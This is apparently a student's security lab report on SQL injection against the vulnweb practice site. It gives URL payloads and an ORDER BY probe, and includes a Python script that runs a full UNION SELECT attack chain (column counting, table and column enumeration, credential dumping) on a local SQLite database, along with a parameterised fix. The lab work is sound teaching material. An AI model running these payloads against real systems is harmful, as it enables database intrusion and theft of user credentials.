Web & Mobile Security Lab 20CSP-338: Bachelor Degree of Engineering
20CSP-338
Submitted for the requirement of
Lab Course
Param Sahai
20BCS5964
Experiment 1.4
3. Steps:
iii. Next, inject into the URL by placing a minus sign in front of the 1, so that the query matches no legitimate rows, i.e.
http://testphp.vulnweb.com/listproducts.php?cat=-1
iv. We can also append an ORDER BY clause with an increasing number to the URL; the first number that produces an error is one more than the number of columns in the original query.
Fig 1.4.1 (How does a SQL Injection attack works)
4. Screenshots:
Fig 1.4.3 (Checking out our query with cat=1)
Fig 1.4.4 (Checking out our query with cat=-1)
Fig 1.4.5 (Performing Union Select Query for checking out the Database)
Fig 1.4.6 (Performing Union Select Query for checking out the Tablename)
The users table may hold sensitive data, so we dig further. Again, use the concat function (group_concat(), which returns every name in a single row) on the users table to retrieve all of its column names with one query.
We successfully retrieve all eight column names of the users table.
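The whole procedure of steps iii and iv, the UNION SELECT enumeration of table and column names from the screenshots, and the credential dump from the users table, carried out end to end against a constructed in-memory SQLite database. This is an added example written for this report; it is not the lab's own code and not the code of the vulnweb application. SQLite is used so it runs offline, which changes two names: the metadata table is sqlite_master and the column list comes from pragma_table_info(), where MySQL (the real target) would use information_schema.tables and information_schema.columns. The listproducts function, the schema and the sample rows are assumptions of the example; the hardened variant beside it shows the parameterised query that defeats every payload.

```python
import sqlite3

# Constructed sample schema standing in for the vulnweb catalogue: a products
# table behind listproducts.php and a users table holding the sensitive data.
SCHEMA = """
CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT, price TEXT);
INSERT INTO products VALUES (1, 1, 'Lens', '10'), (2, 1, 'Tripod', '25'),
                            (3, 2, 'Bag', '15');
CREATE TABLE users (uname TEXT, pass TEXT, cc TEXT, address TEXT,
                    email TEXT, name TEXT, phone TEXT, cart TEXT);
INSERT INTO users VALUES ('test', 'test', '1234-5678', 'Street 1',
                         'test@example.com', 'Test User', '555-0100', 'cart1');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def list_products_vulnerable(conn, cat):
    # Hypothetical stand-in for listproducts.php: the cat parameter is pasted
    # straight into the SQL text, which is the defect the report exploits.
    sql = "SELECT id, name, price, cat FROM products WHERE cat=" + cat
    return conn.execute(sql).fetchall()


def list_products_fixed(conn, cat):
    # Hardened form: the value is validated as an integer and travels as a
    # bound parameter, so it can never be interpreted as SQL.
    return conn.execute(
        "SELECT id, name, price, cat FROM products WHERE cat=?", (int(cat),)
    ).fetchall()


def find_column_count(conn, max_cols=20):
    # Step iv: append ORDER BY n with increasing n. The first n that raises an
    # error is one past the number of columns in the original SELECT.
    for n in range(1, max_cols + 1):
        try:
            list_products_vulnerable(conn, f"1 ORDER BY {n}")
        except sqlite3.OperationalError:
            return n - 1
    return None


def union_extract(conn, expr, from_clause, ncols):
    # Step iii plus UNION SELECT: cat=-1 empties the legitimate result set, so
    # the UNION'd row is the only one returned. Remaining columns are NULL
    # padding so the column counts on both sides of the UNION match.
    cols = [expr] + ["NULL"] * (ncols - 1)
    payload = f"-1 UNION SELECT {', '.join(cols)} FROM {from_clause}"
    rows = list_products_vulnerable(conn, payload)
    return rows[0][0] if rows else None


def run_attack():
    conn = open_db()
    ncols = find_column_count(conn)
    # Table names (MySQL: information_schema.tables WHERE table_schema=database()).
    tables = union_extract(conn, "group_concat(name)",
                           "sqlite_master WHERE type='table'", ncols)
    # Column names of users (MySQL: information_schema.columns WHERE table_name='users').
    columns = union_extract(conn, "group_concat(name)",
                            "pragma_table_info('users')", ncols)
    # Finally the data itself, one row of uname:pass pairs.
    creds = union_extract(conn, "group_concat(uname || ':' || pass)",
                          "users", ncols)
    # The same UNION payload against the hardened endpoint is rejected outright.
    try:
        list_products_fixed(conn, "-1 UNION SELECT 1,2,3,4")
        fixed_blocked = False
    except ValueError:
        fixed_blocked = True
    return {
        "column_count": ncols,
        "tables": tables,
        "users_columns": columns,
        "creds": creds,
        "fixed_blocked": fixed_blocked,
        "fixed_rows_for_minus_one": list_products_fixed(conn, "-1"),
    }


if __name__ == "__main__":
    for key, value in run_attack().items():
        print(f"{key}: {value}")
```

Against this constructed schema the ORDER BY probe stops at 4 columns, the table list comes back as products,users, the users table yields its eight column names in one row, and the parameterised version returns no rows for -1 and raises on the UNION payload before any SQL is executed.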
Evaluation Grid (To be created as per the SOP and Assessment guidelines by the faculty):